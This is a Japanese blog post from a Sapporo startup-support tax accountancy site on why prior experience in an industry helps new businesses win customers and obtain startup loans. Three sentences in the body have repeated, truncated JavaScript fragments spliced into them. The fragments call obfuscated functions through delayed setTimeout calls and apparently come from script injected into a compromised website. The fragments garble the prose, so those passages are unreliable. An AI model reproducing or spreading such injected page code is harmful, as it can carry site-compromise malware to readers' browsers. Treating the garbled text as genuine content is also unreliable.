札幌での起業・独立・開業を専門税理士バックアップ | 札幌・起業設立サポート

起業する業種の経験の重要性

  • 公開日:2015/04/30
  • 最終更新日:2015/04/30

起業、経験、重要性

まったく経験のないビジネスを始めるよりも、長年の経験を活かしたビジネスを始めた方が、その商品やサービスの質が優れているのは明白です。日本政策金融公庫調査月報2015 4月号(NO.079)に非常に興味深い記事が掲載されていましたのでご紹介します。

 

起業する業種の経験が重要な理由とは

調査レポート「新規開業企業における顧客の確保・獲得のポイント」の中で、顧客を確保・獲得する上の重要な要素として「開業者のキャリア」andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}があげられています。「新規開業企業は企業としての信用が無いため、顧客を確保・獲得しようとする際には、企業としての信用に代わるものが必要になると考えられる。

開業者が十分なキャリアをもっていれば、それは企業としての信用に代わるものとなるだろうandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}」と分析しています。

また、起業する上で経験が重要とされるのには、もう一つ理由があります。経験が無い場合、「創業融資の審査上不利になる場合がある」andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}からです。

創業融資の審査については、前述ブログ「創業で金融機関から融資を受ける際に最も重要なこと」において、ビジネスの将来性や熱意が大事と述べましたが、それ以前の基本的な要素として、その業種での経験がものを言います。

そうした経験が裏付けとなっているからこそ、ビジネスの将来性や熱意は真実味があるからです。

 

未経験業種の起業の場合

しかしながら、「趣味が高じて」とか、「その業種のビジネスモデルや将来性に着目して」など本業としては全く未経験の分野で起業したい、という方もいるかと思います。

もちろん、未経験だとしても、その業界のビジネスを多角的に学び、人脈を構築し事業として確立することは、不可能ではありません。そこがしっかりしていれば、融資を受けることは十分可能です。

しかしながら、未経験の方の中には、その分野の技術面や売れ筋など断片的な事柄には詳しいが、事業として運営していく上での知識(ノウハウ)が足りない方が少なからずいらっしゃいます。

そうした経験不足からくる知識の抜け漏れを埋めるには、同業種に一度転職(修行)してみるのも方法の1つです。そうすれば、ビジネスとしての一連の流れが分かるだけでなく、「ここをこうしたらいいのでは?」等の、自身が起業した時に活かすヒントを得ることもできます。

もう1つは、「その業種で経験豊富な人物を役員として入れる」こと。但し、これは融資の際、連帯保証人としてサインが求められる場合もありますので注意が必要です。

このように、起業する上では、その業種についての断片的な知識だけでなく、事業としての経験、ノウハウが重要です。

このブログを御覧頂いている方の中には少なからず起業を志している方がいらっしゃると思います。今一度ご自身の経験や、ノウハウを棚卸してみて抜け漏れがないか、確認してはいかがでしょうか?

札幌で会社設立をお考えの方はまずお問い合わせください。

札幌・起業設立サポート

関連記事

オープニングプラン

開業時の集客計画「オープニングプラン」について

前回は、「起業時のブランディング」のことについてご説明しましたが、今回は、ブランディングをし...

設立個人の手続きの違い

個人事業主と法人設立の違い

個人事業でスタートするか、会社を設立するか、起業するにあたって事業形態をどうするのかは創業者...

自社ブランド

自社ブランド確立のために

今回は、自社のブランド力について考えてみたいと思います。ブランドとお聞きになって、ルイ・ヴィ...

会社設立開業準備

会社設立・開業の際の準備3つのポイント

新たに事業を始める時には、業種によって特別な手続きが必要なものがあります。 また、開業するに...

札幌・起業設立サポート

最新コンテンツ

売上アップの着眼点
売上アップの着眼点
今後ますます少子高齢化が進み、地方都市の人口は減少することが予想され
消費者の不便・不満解消がヒットの秘訣
消費者の不便・不満解消がヒットの秘訣
「物が売れない時代」といわれる中でも、数々のヒット商品が生まれていま
ピンチをチャンスに!売上アップを目指そう
ピンチをチャンスに!売上アップを目指そう
中小企業を取り巻く環境は、ますます厳しさを増しています。 新規創業さ
損益計算書を収益改善に活かす
損益計算書を収益改善に活かす
利益を生み出すためには「売上」を上げる、「原価」「費用」を小さくする
日々の現金管理のポイント
日々の現金管理のポイント
日々の現金管理は、正しい経理処理の基本であり、会社の規模の大小に関わ

PAGE TOP